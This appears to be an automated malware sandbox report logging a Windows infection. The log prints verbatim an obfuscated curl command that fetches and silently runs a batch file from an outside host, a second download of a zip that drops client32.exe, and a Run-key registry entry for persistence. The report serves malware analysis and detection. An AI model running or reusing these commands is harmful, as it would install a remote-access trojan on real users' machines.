Source: C:\Windows\System32\osk.exe	Windows user hook set: 4000 call wnd proc C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 4000 get message C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 2216 call wnd proc C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 2216 get message C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 2216 call wnd proc C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 2216 get message C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 4104 call wnd proc C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 4104 get message C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 4208 call wnd proc C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 4208 get message C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 7940 call wnd proc C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 7940 get message C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 4104 call wnd proc C:\Windows\System32\uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Windows user hook set: 4104 get message C:\Windows\System32\uiautomationcore.dll	Jump to behavior

Source: C:\Windows\System32\osk.exe

Windows user hook set: 0 mouse low level C:\Windows\system32\osk.exe

Jump to behavior

Source: Yara match

File source: C:\Users\user\AppData\Roaming\Dire\PCICL32.DLL, type: DROPPED

Source: C:\Users\user\AppData\Roaming\Dire\client32.exe

Process Stats: CPU usage > 24%

Source: avutil-59.dll.31.dr	Static PE information: Number of sections : 12 > 10
Source: libopus-0.dll0.31.dr	Static PE information: Number of sections : 11 > 10
Source: libopus-0.dll.31.dr	Static PE information: Number of sections : 11 > 10
Source: libopus-0.dll1.31.dr	Static PE information: Number of sections : 11 > 10
Source: avutil-59.dll0.31.dr	Static PE information: Number of sections : 12 > 10
Source: avutil-59.dll1.31.dr	Static PE information: Number of sections : 12 > 10

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "PP1" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Dire\client32.exe" /f

Source: classification engine

Classification label: mal96.phis.spyw.win@76/248@600/22

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\slideshow.ini

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1532:120:WilError_03
Source: C:\Windows\System32\osk.exe	Mutant created: \Sessions\1\BaseNamedObjects\OSKRunning
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5068:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5940:120:WilError_03

Source: C:\Windows\System32\conhost.exe

Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter

Source: C:\Windows\explorer.exe

File read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini

Jump to behavior

Source: C:\Windows\System32\osk.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1916,i,7536689697290903459,10962904390226594529,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2040 /prefetch:3
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://fountainofhealth.ca"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-pre-read-main-dll --field-trial-handle=1916,i,7536689697290903459,10962904390226594529,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=6080 /prefetch:8
Source: unknown	Process created: C:\Windows\System32\osk.exe "C:\Windows\system32\osk.exe"
Source: unknown	Process created: C:\Windows\System32\osk.exe "C:\Windows\system32\osk.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php" -o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -s -o C:\Users\user\AppData\Roaming\gety.zip https://www.stlchicago.com/rabu.zip??56cfb29adde612865acb
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tar.exe tar -xf "C:\Users\user\AppData\Roaming\gety.zip" -C "C:\Users\user\AppData\Roaming\Dire"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Dire\client32.exe "C:\Users\user\AppData\Roaming\Dire\client32.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "PP1" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Dire\client32.exe" /f
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php" -o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php" -o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1916,i,7536689697290903459,10962904390226594529,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2040 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-pre-read-main-dll --field-trial-handle=1916,i,7536689697290903459,10962904390226594529,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=6080 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://fountainofhealth.ca"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php" -o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php" -o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\curl.exe curl -s -o C:\Users\user\AppData\Roaming\gety.zip https://www.stlchicago.com/rabu.zip??56cfb29adde612865acb	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\cvcv.bat Enter	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -s -o C:\Users\user\AppData\Roaming\gety.zip https://www.stlchicago.com/rabu.zip??56cfb29adde612865acb	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tar.exe tar -xf "C:\Users\user\AppData\Roaming\gety.zip" -C "C:\Users\user\AppData\Roaming\Dire"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Dire\client32.exe "C:\Users\user\AppData\Roaming\Dire\client32.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "PP1" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Dire\client32.exe" /f	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat

Source: C:\Windows\System32\osk.exe	Section loaded: osksupport.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: wmsgapi.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: ksuser.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: midimap.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: mstextprediction.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: hid.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: uiamanager.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: actxprxy.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Windows\System32\osk.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: osksupport.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cdprt.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.fileexplorer.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: uiribbon.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: networkexplorer.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: capabilityaccessmanagerclient.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: storageusage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: fhcfg.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: efsutil.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.system.userprofile.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cloudexperiencehostbroker.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: credui.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wpnapps.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\tar.exe	Section loaded: archiveint.dll
Source: C:\Windows\System32\tar.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\tar.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: pcicl32.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: pcichek.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: pcicapi.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: dbgcore.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: nsmtrace.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: nslsp.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Section loaded: pcihooks.dll
